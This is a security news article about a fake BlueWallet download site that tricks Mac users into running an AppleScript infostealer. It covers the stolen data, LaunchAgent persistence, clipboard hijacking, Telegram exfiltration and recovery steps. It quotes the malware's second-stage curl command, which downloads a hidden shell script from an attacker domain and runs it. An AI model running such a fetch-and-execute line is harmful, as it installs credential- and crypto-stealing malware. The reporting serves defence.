Fake BlueWallet Scam Targets Mac Users’ Crypto Assets

A sophisticated social engineering campaign is currently targeting macOS users through a fake website impersonating BlueWallet, the legitimate Bitcoin wallet. The scam tricks users into downloading and executing malicious software designed to compromise sensitive data and cryptocurrency assets. BlueWallet itself remains uncompromised, with attackers simply leveraging its trusted brand for their attack.

How the Attack Works

Cybercriminals have created a convincing fake download page at update-bluewallet[.]com that mimics the official BlueWallet website. Rather than exploiting technical vulnerabilities in macOS, the attack relies on convincing users to bypass security controls themselves.

When a victim visits the fake site, a file named BlueWallet Installer.applescript automatically downloads. The website then presents seemingly legitimate setup instructions, directing users to open the script in macOS’s built-in Script Editor and press the Play button or use the keyboard shortcut ⌘R.

This approach is deliberately clever. By having users manually run the code through a trusted Apple tool, the malware sidesteps macOS’s notarization and quarantine checks that typically block unsigned applications. The user becomes a willing participant in their own compromise.

The Multi-Stage Payload

The AppleScript that runs initially is quite simple. It executes a base64-encoded shell command that fetches a secondary script from projects2026box[.]com.

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

This second stage payload, named .sysupd.sh, operates stealthily by hiding in the /tmp directory with restricted file permissions readable only to the compromised user. Configuration details including Telegram bot tokens and command-and-control identifiers are weakly obfuscated using XOR cipher. The malware also contains plain-text Bitcoin, Ethereum, and Solana wallet addresses used for clipboard hijacking.

What Gets Stolen

Once active, the malware initiates a broad sweep of sensitive data across multiple categories. Its reach is extensive and systematic.

Browser data: The malware extracts history, cookies, login credentials, and bookmarks from Chromium-based browsers like Chrome, Brave, and Edge, as well as Firefox-based browsers. It also targets macOS native Safari data including cookies, history, and saved form values.

Cryptocurrency wallets: Desktop wallet applications including Electrum, Exodus, Atomic Wallet, Ledger Live, and Trezor Suite are targeted. Browser-extension wallets across Bitcoin, Solana, EVM, and Cosmos ecosystems are also compromised, including MetaMask, Phantom, and Keplr.

Security credentials: The malware steals data from password managers like LastPass, 1Password, Dashlane, and Bitwarden, along with 2FA and authenticator tools such as Google Authenticator and Authy.

Communication apps: Session data and local storage from Telegram Desktop and Discord are copied.

Developer and cloud tools: The malware searches for AWS CLI configurations, SSH keys, GnuPG keys, Kubernetes configs, and Git files containing credentials.

General files: The malware copies the local Apple Notes database and scans for specific file types including .txt, .pdf, .docx, .wallet, .key, and .seed files in common user directories.

Persistence and Control

Beyond the initial data theft, the malware establishes persistence by writing a LaunchAgent plist file into ~/Library/LaunchAgents, ensuring it runs automatically at every login.

The most dangerous feature is its live clipboard hijacking loop, which continuously monitors for cryptocurrency wallet addresses. When a user copies a wallet address, the malware silently replaces it with an attacker-controlled address. This means funds sent by the victim go directly to the attacker instead of the intended destination.

The malware also attempts to capture the user’s macOS account password through a fake System Preferences dialog. For data exfiltration, it uses macOS’s native ditto command to archive stolen information and splits files into 49 MB chunks to comply with Telegram’s upload limits.

Finally, the malware supports interactive control via Telegram bot, allowing attackers to execute arbitrary shell commands, download specific files from the victim’s machine, and even trigger a self-destruct sequence.

If You’re Compromised

If you suspect your Mac has been infected with this malware, immediate action is critical. Time is essential when protecting your cryptocurrency and sensitive data.

1. Disconnect the compromised machine from the network immediately to sever the command-and-control connection.
2. Run a full scan using up-to-date security software with web protection enabled. Malwarebytes Premium can help, or start with a free virus scan.
3. From a different trusted device, change passwords for all accounts used on the compromised Mac. Prioritize email and cryptocurrency exchange accounts.
4. Move any cryptocurrency to a new wallet created on a clean device. Treat all existing seed phrases and private keys as compromised.
5. Before sending crypto in the future, verify the full destination address character by character.
6. Check ~/Library/LaunchAgents for unfamiliar files and look for the hidden .sysupd.sh file in /tmp.
7. Rotate cloud and SSH credentials if files like .ssh, .aws, or .gnupg were on the machine.
8. If uncertain about the extent of the compromise, back up your data and reinstall macOS from a trusted source rather than attempting manual cleanup.

The Real Vulnerability

This campaign reveals an important trend: as operating systems strengthen their technical security, attackers increasingly pivot to social engineering. The fake BlueWallet scam didn’t bypass Apple’s security controls. It convinced users to click through them voluntarily.

The most critical defense is human vigilance. Be deeply suspicious of any download that arrives with instructions to open it in Script Editor, a developer utility, or Terminal and press “Run.” This pattern should immediately raise red flags.

Protect your device today and encourage others to verify download sources before executing any installer scripts. In the current threat landscape, user awareness is the strongest line of defense.

Follow Hashlytics on Bluesky, LinkedIn, Telegram and X to Get Instant Updates